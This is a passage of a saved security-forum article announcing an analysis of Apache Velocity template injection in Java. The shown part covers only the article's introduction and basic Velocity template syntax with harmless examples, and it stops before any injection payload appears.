(min-width:1200px){.container{width:82%!important}}@media screen and (min-width:1500px){#Wrapper.container,.navbar .navbar-inner .container,.bs-docs-footer .container{max-width:1100px!important}#Wrapper .span10{max-width:810px!important}}@media screen and (min-width:980px) and (max-width:1499px){#Wrapper.container,.navbar .navbar-inner .container,.bs-docs-footer .container{max-width:1100px!important}#Wrapper .span10{max-width:74%!important}}@media screen and (min-width:768px) and (max-width:979px){#Wrapper.container,.navbar .navbar-inner .container,.bs-docs-footer .container{width:90%!important}#Wrapper .span10{width:77%!important}.nav-collapse{clear:none!important;height:auto!important;overflow:auto!important;float:right}}@media screen and (max-width:767px){#Wrapper.container,.navbar .navbar-inner .container,.bs-docs-footer .container{width:100%!important}.topic-info .info-left,.topic-info .info-right{display:block}.topic-info .info-right{margin-top:10px}.topic-info span{margin-left:0px}}@media screen and (max-width:419px){body{padding-left:0px!important;padding-right:0px!important}}.content-node{padding-left:5px}@media (max-width:979px){.content-node{display:none}.t-vote{display:none!important}}@media (max-width:376px){}@media (min-width:768px){}@media (min-width:992px){}@media (min-width:1200px){}</style>
<style>/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 */@media only screen and (-webkit-min-device-pixel-ratio:2),only screen and (min-device-pixel-ratio:2){}@media only screen and (-webkit-min-device-pixel-ratio:3),only screen and (min-device-pixel-ratio:3){}/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 *//*!
* Font Awesome 4.3.0 by @davegandy - http://fontawesome.io - @fontawesome
* License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License)
*/@font-face{font-family:"FontAwesome";src:/* original URL: https://xz.aliyun.com/static/editor.md/fonts/fontawesome-webfont.woff2?v=4.3.0 */url(data:font/woff2;base64,)format("woff2");font-weight:normal;font-style:normal}.pull-right{float:right}.pull-left{float:left}@-webkit-keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes fa-spin{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}100%{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}/*! prefixes.scss v0.1.0 | Author: Pandao | https://github.com/pandao/prefixes.scss | MIT license | Copyright (c) 2015 */@font-face{font-family:"editormd-logo";src:/* original URL: https://xz.aliyun.com/static/editor.md/fonts/editormd-logo.woff?-5y8q6h */url(data:font/woff;base64,d09GRgABAAAAAATQAAsAAAAABIQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABPUy8yAAABCAAAAGAAAABgDxINKWNtYXAAAAFoAAAAiAAAAIgAXTTPZ2FzcAAAAfAAAAAIAAAACAAAABBnbHlmAAAB+AAAANQAAADUyLObKGhlYWQAAALMAAAANgAAADYFE0uxaGhlYQAAAwQAAAAkAAAAJAesA8ZobXR4AAADKAAAABQAAAAUBfkAD2xvY2EAAAM8AAAADAAAAAwAKAB+bWF4cAAAA0gAAAAgAAAAIAALACluYW1lAAADaAAAAUUAAAFFVxmm7nBvc3QAAASwAAAAIAAAACAAAwAAAAMEAAGQAAUAAAKZAswAAACPApkCzAAAAesAMwEJAAAAAAAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAQAAA//8DwP/AAEADwABAAAAAAQAAAAAAAAAAAAAAIAAAAAAABAAAAAMAAAAkAAAABAAAAFQAAwABAAAAJAADAAoAAABUAAQAMAAAAAgACAACAAAAAQAg//3//wAAAAAAIP/9//8AAf/jAAMAAQAAAAAAAAAAAAwAAAAAADQAAAAAAAAAAwAAAAAAAAABAAAAAQAAACAAAAAgAAAAAwAOGYcADhmHAAAABAABAAH//wAPAAEAAAAAAAAAAAACAAA3OQEAAAAAAQAAAAAAAAAAAAIAADc5AQAAAAABAAAAAAAAAAAAAgAANzkBAAAAAAUADwAMA+oC8gADAA4AHAAhACYAACUHJxcTNz4BHwEeAQ8BJwMTJyMLASMDMxMBMxMXEycbASMnFxMnAwLXXBVxlQ0FFgs9CwgFDHKcdAeC6vWGR1IwAQgr/Q8qBnUikYxx93L2RDhrMwKBHQsIBRsFFgscMv7jAQVF/fYCCv0aAjL9zgIylv5kPAEH/r19MgIqMv3WAAAAAQAAAAAAALngcqpfDzz1AAsEAAAAAADRBgPhAAAAANEGA+EAAAAAA+oC8gAAAAgAAgAAAAAAAAABAAADwP/AAAAEAAAAAAAD6gABAAAAAAAAAAAAAAAAAAAABQAAAAAAAAAAAAAAAAIAAAAD+QAPAAAAAAAKABQAHgBqAAEAAAAFACcABQAAAAAAAgAAAAAAAAAAAAAAAAAAAAAAAAAOAK4AAQAAAAAAAQAOAAAAAQAAAAAAAgAOAEcAAQAAAAAAAwAOACQAAQAAAAAABAAOAFUAAQAAAAAABQAWAA4AAQAAAAAABgAHADIAAQAAAAAACgA0AGMAAwABBAkAAQAOAAAAAwABBAkAAgAOAEcAAwABBAkAAwAOACQAAwABBAkABAAOAFUAAwABBAkABQAWAA4AAwABBAkABgAOADkAAwABBAkACgA0AGMAaQBjAG8AbQBvAG8AbgBWAGUAcgBzAGkAbwBuACAAMQAuADAAaQBjAG8AbQBvAG8Abmljb21vb24AaQBjAG8AbQBvAG8AbgBSAGUAZwB1AGwAYQByAGkAYwBvAG0AbwBvAG4ARgBvAG4AdAAgAGcAZQBuAGUAcgBhAHQAZQBkACAAYgB5ACAASQBjAG8ATQBvAG8AbgAuAAAAAAMAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=)format("woff");font-weight:normal;font-style:normal}/*! github-markdown-css | The MIT License (MIT) | Copyright (c) Sindre Sorhus <[email protected]> (sindresorhus.com) | https://github.com/sindresorhus/github-markdown-css */@font-face{font-family:octicons-anchor;src:url(data:font/woff;charset=utf-8;base64,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)format("woff")}.markdown-body{color:#333;font-family:Monospaced Number,Chinese Quote,-apple-system,BlinkMacSystemFont,Segoe UI,Roboto,PingFang SC,Hiragino Sans GB,Microsoft YaHei,Helvetica Neue,Helvetica,Arial,sans-serif;font-size:15px;line-height:24px;letter-spacing:.05em;word-wrap:break-word}.markdown-body a{background:transparent}.markdown-body a:active,.markdown-body a:hover{outline:0}.markdown-body strong{font-weight:bold}.markdown-body img{border:0}.markdown-body pre{font-family:"Meiryo UI","YaHei Consolas Hybrid",Consolas,"Malgun Gothic","Segoe UI","Trebuchet MS",Helvetica,monospace,monospace}.markdown-body *{-moz-box-sizing:border-box;box-sizing:border-box}.markdown-body a{color:#4183c4;text-decoration:none}.markdown-body a:hover,.markdown-body a:active{text-decoration:underline}.markdown-body ul{padding:0}.markdown-body pre{font:12px Consolas,"Liberation Mono",Menlo,Courier,monospace}.markdown-body>*:first-child{margin-top:0!important}.markdown-body>*:last-child{margin-bottom:0!important}.markdown-body h3,.markdown-body h4,.markdown-body h5{position:relative;margin-top:1em;margin-bottom:16px;font-weight:bold;line-height:1.4}.markdown-body h3{font-size:20px;line-height:1.43}.markdown-body h4{font-size:18px}.markdown-body h5{font-size:1em}.markdown-body p,.markdown-body ul,.markdown-body pre{margin-top:0;margin-bottom:24px}.markdown-body ul{padding-left:2em}.markdown-body img{max-width:100%;-moz-box-sizing:border-box;box-sizing:border-box}.markdown-body .highlight{margin-bottom:16px}.markdown-body .highlight pre{padding:16px;overflow:auto;font-size:85%;background-color:#f7f7f7;border-radius:3px}.markdown-body .highlight pre{margin-bottom:0;word-break:normal}.markdown-body pre{word-wrap:normal}/*! Pretty printing styles. Used with prettify.js. */@media screen{}@media print,projection{}.markdown-body .highlight pre{line-height:1.6}@media only print{}@media screen{}</style>
<style>.highlight .k{color:#204a87;font-weight:bold}.highlight .n{color:#000000}.highlight .o{color:#ce5c00;font-weight:bold}.highlight .p{color:#000000;font-weight:bold}.highlight .cp{color:#8f5902;font-style:italic}.highlight .c1{color:#8f5902;font-style:italic}.highlight .kt{color:#204a87;font-weight:bold}.highlight .s{color:#4e9a06}.highlight .nb{color:#204a87}.highlight .nf{color:#000000}.highlight .nl{color:#f57900}.highlight .mf{color:#0000cf;font-weight:bold}.highlight .mi{color:#0000cf;font-weight:bold}</style>
<style>@-webkit-keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@keyframes a{0%{-webkit-transform:rotate(0deg);transform:rotate(0deg)}to{-webkit-transform:rotate(359deg);transform:rotate(359deg)}}@media (max-width:800px){}</style>
<!--[if lte IE 8]>
<script src="http://code.jquery.com/jquery-1.11.3.min.js"></script>
<![endif]-->
<!--[if !IE]> -->
<style>#waf_nc_block{position:fixed;width:100%;height:100%;top:0;bottom:0;left:0;z-index:99999}</style><style>@media (pointer:coarse){@media only screen and (max-device-width:1024px){}@media only screen and (max-device-width:414px){}@media only screen and (max-device-width:320px){}}</style><style>@media screen and (max-width:768px){}</style><style>/*!
* Waves v0.7.5
* http://fian.my.id/Waves
*
* Copyright 2014-2016 Alfiana E. Sibuea and other contributors
* Released under the MIT license
* https://github.com/fians/Waves/blob/master/LICENSE
*/</style><style>@media (max-height:620px){}@media (max-height:783px){}@-webkit-keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@keyframes srFadeInUp{0%{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}to{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}}@-webkit-keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}@keyframes srFadeInDown{0%{opacity:1;-webkit-transform:translateY(0);transform:translateY(0)}to{opacity:0;-webkit-transform:translateY(100px);transform:translateY(100px)}}</style><style>@-webkit-keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@keyframes fadeOutUp{0%{opacity:1}to{margin-top:0;padding:0;height:0;min-height:0;opacity:0;-webkit-transform:scaleY(0);transform:scaleY(0)}}@media (pointer:coarse){}</style><style>:root{--sr-annote-color-0:#b4d9fb;--sr-annote-color-1:#ffeb3b;--sr-annote-color-2:#a2e9f2;--sr-annote-color-3:#a1e0ff;--sr-annote-color-4:#a8ea68;--sr-annote-color-5:#ffb7da}</style><style>@-webkit-keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes sr-annote-slideInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0);visibility:visible}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes sr-annote-slideInDown{0%{opacity:1;visibility:visible}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@-webkit-keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@keyframes scaleAnimation{0%{opacity:0;-webkit-transform:scale(1.5);transform:scale(1.5)}to{opacity:1;-webkit-transform:scale(1);transform:scale(1)}}@-webkit-keyframes fadeOut{0%{opacity:1}to{opacity:0}}@keyframes fadeOut{0%{opacity:1}to{opacity:0}}@-webkit-keyframes fadeIn{0%{opacity:0}to{opacity:1}}@keyframes fadeIn{0%{opacity:0}to{opacity:1}}@-webkit-keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}@keyframes swing{20%{-webkit-transform:rotate(15deg);transform:rotate(15deg)}40%{-webkit-transform:rotate(-10deg);transform:rotate(-10deg)}60%{-webkit-transform:rotate(5deg);transform:rotate(5deg)}80%{-webkit-transform:rotate(-5deg);transform:rotate(-5deg)}to{-webkit-transform:rotate(0deg);transform:rotate(0deg)}}</style><style>@-webkit-keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@keyframes fadeInUp{0%{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}to{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}}@-webkit-keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}@keyframes fadeOutDown{0%{opacity:1;-webkit-transform:translateZ(0);transform:translateZ(0)}to{opacity:0;-webkit-transform:translate3d(0,100%,0);transform:translate3d(0,100%,0)}}</style><style data-id=immersive-translate-input-injected-css>@-webkit-keyframes immersive-translate-loading-animation{from{-webkit-transform:rotate(0deg)}to{-webkit-transform:rotate(359deg)}}@keyframes immersive-translate-loading-animation{from{transform:rotate(0deg)}to{transform:rotate(359deg)}}@keyframes immersiveTranslateShadowRolling{0%{box-shadow:0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}12%{box-shadow:100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}25%{box-shadow:110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0),0px 0 rgba(255,255,255,0)}36%{box-shadow:120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color),0px 0 rgba(255,255,255,0)}50%{box-shadow:130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color),100px 0 var(--loading-color)}62%{box-shadow:200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color),110px 0 var(--loading-color)}75%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color),120px 0 var(--loading-color)}87%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),130px 0 var(--loading-color)}100%{box-shadow:200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0),200px 0 rgba(255,255,255,0)}}@media screen and (max-width:768px){}@media screen and (max-width:768px){}</style><meta name=referrer content=no-referrer><link rel=icon href="" type=image/x-icon data-sf-original-href=https://xz.aliyun.com/static/icon/favicon.ico><style>.sf-hidden{display:none!important}</style><link rel=canonical href="https://xz.aliyun.com/t/15358?time__1311=GqjxnD2DyG0Q%3DGNDQ0PiKqAKitOp6u0AbD"><meta http-equiv=content-security-policy content="default-src 'none'; font-src 'self' data:; img-src 'self' data:; style-src 'unsafe-inline'; media-src 'self' data:; script-src 'unsafe-inline' data:; object-src 'self' data:; frame-src 'self' data:;"><style>img[src="data:,"],source[src="data:,"]{display:none!important}</style></head>
<body>
<div class="navbar navbar-default">
<div class=navbar-inner>
<div class=container style=text-align:center;position:relative>
<!--[if lte IE 8]>
<span style="display:inline-block;margin:0 auto;color:red;">为了更好的体验,请使用IE10及以上版本</span>
<![endif]-->
<div class=brand-box>
<a class=brand href=https://xz.aliyun.com/tab/1></a>
</div>
<a href="https://account.aliyun.com/login/login.htm?oauth_callback=https%3A%2F%2Fxz.aliyun.com%2Ft%2F15358&from_type=xianzhi" class="pull-right anonymous-user hh_loding sf-hidden">
登录</a>
<div class="nav-collapse collapse">
<div class="search d1 text-right">
<form action=/search>
<input type=text placeholder=搜索 name=keyword value>
</form>
</div>
</div>
</div>
</div>
</div>
<div id=Wrapper class=container>
<div class=row2>
<div class=span10>
<div class="row box content" width="1200px !important" style=width:1200px>
<div class=box-container>
<div class=main-topic>
<div class="clearfix user-info topic-list">
<p><span class=content-title>JAVA安全之Velocity模板注入刨析</span>
</p>
<div class=topic-info>
<span class=info-left>
<a href=https://xz.aliyun.com/u/10995>
<span class="username cell"> Al1ex</span></a> <span class=i-seprator> / </span>
<span> 2024-08-21 10:25:55</span><span class=i-seprator> / </span>
<span>发表于四川 / </span>
<span>浏览数 21</span>
<span class=content-node>
<span class="label label-default label-node-first">
<a href=https://xz.aliyun.com/tab/4>社区板块</a></span>
<span class="label label-default">
<a href=https://xz.aliyun.com/node/16>WEB安全</a></span>
</span>
</span>
<span class="pull-right t-vote cell info-right"><a class="vote vote-up" href=javascript:void(0)>
顶(0)</a>
<a class="vote vote-down" href=javascript:void(0)>
踩(0)</a></span>
</div>
</div>
<hr>
<div id=topic_content class="topic-content markdown-body">
<h3 id=toc-0>文章前言</h3>
<p>关于Velocity模板注入注入之前一直缺乏一个系统性的学习和整理,搜索网上大多数类似的内容都是一些关于漏洞利用的复现,而且大多都仅限于Velocity.evaluate的执行,对于载荷的构造以及执行过程并没有详细的流程分析,于是乎只能自己动手来填坑了~</p>
<h3 id=toc-1>模板介绍</h3>
<p>Apache Velocity是一个基于模板的引擎,用于生成文本输出(例如:HTML、XML或任何其他形式的ASCII文本),它的设计目标是提供一种简单且灵活的方式来将模板和上下文数据结合在一起,因此被广泛应用于各种Java应用程序中包括Web应用</p>
<h3 id=toc-2>基本语法</h3>
<p>Apache Velocity的语法简洁明了,主要由变量引用、控制结构(例如:条件和循环)、宏定义等组成</p>
<h4>变量引用</h4>
<p>在Velocity模板中可以使用$符号来引用上下文中的变量,例如:</p>
<div class=highlight><pre><span></span><span class=n>Hello</span><span class=p>,</span> <span class=err>$</span><span class=n>name</span><span class=o>!</span>
</pre></div>
<p>示例代码:</p>
<div class=highlight><pre><span></span><span class=cp>#Java代码</span>
<span class=n>context</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=s>"name"</span><span class=p>,</span> <span class=s>"Al1ex"</span><span class=p>);</span>
<span class=cp>#模板内容</span>
<span class=n>Hello</span><span class=p>,</span> <span class=err>$</span><span class=n>name</span><span class=o>!</span> <span class=c1>// 输出: Hello, Al1ex!</span>
</pre></div>
<h4>条件判断</h4>
<p>Velocity支持基本的条件判断,通过#if、#else和#end指令来实现:</p>
<div class=highlight><pre><span></span><span class=cp>#if($user.isLoggedIn())</span>
<span class=n>Welcome</span> <span class=n>back</span><span class=p>,</span> <span class=err>$</span><span class=n>user</span><span class=p>.</span><span class=n>name</span><span class=o>!</span>
<span class=cp>#else</span>
<span class=n>Please</span> <span class=n>log</span> <span class=n>in</span><span class=p>.</span>
<span class=cp>#end</span>
</pre></div>
<p>示例代码:</p>
<div class=highlight><pre><span></span><span class=cp>#Java代码</span>
<span class=n>context</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=s>"user"</span><span class=p>,</span> <span class=n>new</span> <span class=n>User</span><span class=p>(</span><span class=s>"Al1ex"</span><span class=p>,</span> <span class=nb>true</span><span class=p>));</span> <span class=c1>// 假设 User 类有 isLoggedIn 方法</span>
<span class=cp>#模板内容</span>
<span class=cp>#if($user.isLoggedIn())</span>
<span class=n>Welcome</span> <span class=n>back</span><span class=p>,</span> <span class=err>$</span><span class=n>user</span><span class=p>.</span><span class=n>name</span><span class=o>!</span>
<span class=cp>#else</span>
<span class=n>Please</span> <span class=n>log</span> <span class=n>in</span><span class=p>.</span>
<span class=cp>#end</span>
<span class=c1>// 输出: Welcome back, Al1ex!</span>
</pre></div>
<h4>循环操作</h4>
<p>通过使用#foreach来遍历集合或数组</p>
<div class=highlight><pre><span></span><span class=cp>#foreach($item in $items)</span>
<span class=o><</span><span class=n>li</span><span class=o>></span><span class=err>$</span><span class=n>item</span><span class=o></</span><span class=n>li</span><span class=o>></span>
<span class=cp>#end</span>
</pre></div>
<p>示例代码:</p>
<div class=highlight><pre><span></span><span class=cp>#Java代码</span>
<span class=n>context</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=s>"items"</span><span class=p>,</span> <span class=n>Arrays</span><span class=p>.</span><span class=n>asList</span><span class=p>(</span><span class=s>"Apple"</span><span class=p>,</span> <span class=s>"Banana"</span><span class=p>,</span> <span class=s>"Cherry"</span><span class=p>));</span>
<span class=cp>#模板内容</span>
<span class=o><</span><span class=n>ul</span><span class=o>></span>
<span class=cp>#foreach($item in $items)</span>
<span class=o><</span><span class=n>li</span><span class=o>></span><span class=err>$</span><span class=n>item</span><span class=o></</span><span class=n>li</span><span class=o>></span>
<span class=cp>#end</span>
<span class=o></</span><span class=n>ul</span><span class=o>></span>
<span class=cp>#输出:</span>
<span class=o><</span><span class=n>ul</span><span class=o>></span>
<span class=o><</span><span class=n>li</span><span class=o>></span><span class=n>Apple</span><span class=o></</span><span class=n>li</span><span class=o>></span>
<span class=o><</span><span class=n>li</span><span class=o>></span><span class=n>Banana</span><span class=o></</span><span class=n>li</span><span class=o>></span>
<span class=o><</span><span class=n>li</span><span class=o>></span><span class=n>Cherry</span><span class=o></</span><span class=n>li</span><span class=o>></span>
<span class=o></</span><span class=n>ul</span><span class=o>></span>
</pre></div>
<h4>宏定义类</h4>
<p>Velocity支持定义宏,方便复用代码块,宏通过#macro定义,通过#end结束:</p>
<div class=highlight><pre><span></span><span class=cp>#macro(greet $name)</span>
<span class=n>Hello</span><span class=p>,</span> <span class=err>$</span><span class=n>name</span><span class=o>!</span>
<span class=cp>#end</span>
<span class=cp>#greet("World")</span>
</pre></div>
<p>示例代码:</p>
<div class=highlight><pre><span></span><span class=cp>#模板内容</span>
<span class=cp>#macro(greet $name)</span>
<span class=n>Hello</span><span class=p>,</span> <span class=err>$</span><span class=n>name</span><span class=o>!</span>
<span class=cp>#end</span>
<span class=cp>#greet("Alice")</span>
<span class=cp>#输出: Hello, Alice!</span>
</pre></div>
<h4>方法调用</h4>
<p>Velocity允许使用#符号调用工具类的方法,在使用工具类时你需要在上下文中放入相应的对象</p>
<div class=highlight><pre><span></span><span class=cp>#set($currentDate = $dateTool.get("yyyy-MM-dd"))</span>
<span class=n>Today</span><span class=err>'</span><span class=n>s</span> <span class=n>date</span> <span class=n>is</span> <span class=err>$</span><span class=n>currentDate</span><span class=p>.</span>
</pre></div>
<p>示例代码:</p>
<div class=highlight><pre><span></span><span class=n>import</span> <span class=n>org</span><span class=p>.</span><span class=n>apache</span><span class=p>.</span><span class=n>commons</span><span class=p>.</span><span class=n>lang3</span><span class=p>.</span><span class=n>time</span><span class=p>.</span><span class=n>DateUtils</span><span class=p>;</span>
<span class=cp>#Java代码</span>
<span class=n>context</span><span class=p>.</span><span class=n>put</span><span class=p>(</span><span class=s>"dateTool"</span><span class=p>,</span> <span class=n>new</span> <span class=n>DateUtils</span><span class=p>());</span>
<span class=cp>#模板内容</span>
<span class=cp>#set($currentDate = $dateTool.format(new Date(), "yyyy-MM-dd"))</span>
<span class=n>Today</span><span class=err>'</span><span class=n>s</span> <span class=n>date</span> <span class=n>is</span> <span class=err>$</span><span class=n>currentDate</span><span class=p>.</span>
<span class=cp>#输出内容: </span>
<span class=n>Today</span><span class=err>'</span><span class=n>s</span> <span class=n>date</span> <span class=n>is</span> <span class=mi>2024</span><span class=o>-</span><span class=mi>08</span><span class=o>-</span><span class=mi>16</span>
</pre></div>
<h4>包含插入</h4>
<p>Velocity支持包含其他模板文件,通过#include指令实现,例如:<br>
主模板文件main.vm</p>
<div class=highlight><pre><span></span><span class=n>Hello</span><span class=p>,</span> <span class=err>$</span><span class=n>name</span><span class=o>!</span>
<span class=cp>#if($isAdmin)</span>
<span class=cp>#include</span><span class=cpf>("adminDashboard.vm")</span><span class=cp></span>
<span class=cp>#else</span>
<span class=cp>#include</span><span class=cpf>("userDashboard.vm")</span><span class=cp></span>
<span class=cp>#end</span>
</pre></div>
<p>用户仪表盘模板文件userDashboard.vm</p>
<div class=highlight><pre><span></span><span class=n>Welcome</span> <span class=n>to</span> <span class=n>your</span> <span class=n>user</span> <span class=n>dashboard</span><span class=p>.</span>
<span class=n>Here</span> <span class=n>are</span> <span class=n>your</span> <span class=n>notifications</span><span class=p>...</span>
</pre></div>
<p>管理员仪表盘模板文件adminDashboard.vm</p>
<div class=highlight><pre><span></span><span class=n>Welcome</span> <span class=n>to</span> <span class=n>the</span> <span class=n>admin</span> <span class=n>dashboard</span><span class=p>.</span>
<span class=n>You</span> <span class=n>have</span> <span class=n>access</span> <span class=n>to</span> <span class=n>all</span> <span class=n>administrative</span> <span class=n>tools</span><span class=p>.</span>
</pre></div>
<p>假设我们有以下 Java 代码来渲染主模板:</p>
<div class=highlight><pre><span></span><span class=n>import</span> <span class=n>org</span><span class=p>.</span><span class=n>apache</span><span class=p>.</span><span class=n>velocity</span><span class=p>.</span><span class=n>app</span><span class=p>.</span><span class=n>VelocityEngine</span><span class=p>;</span>
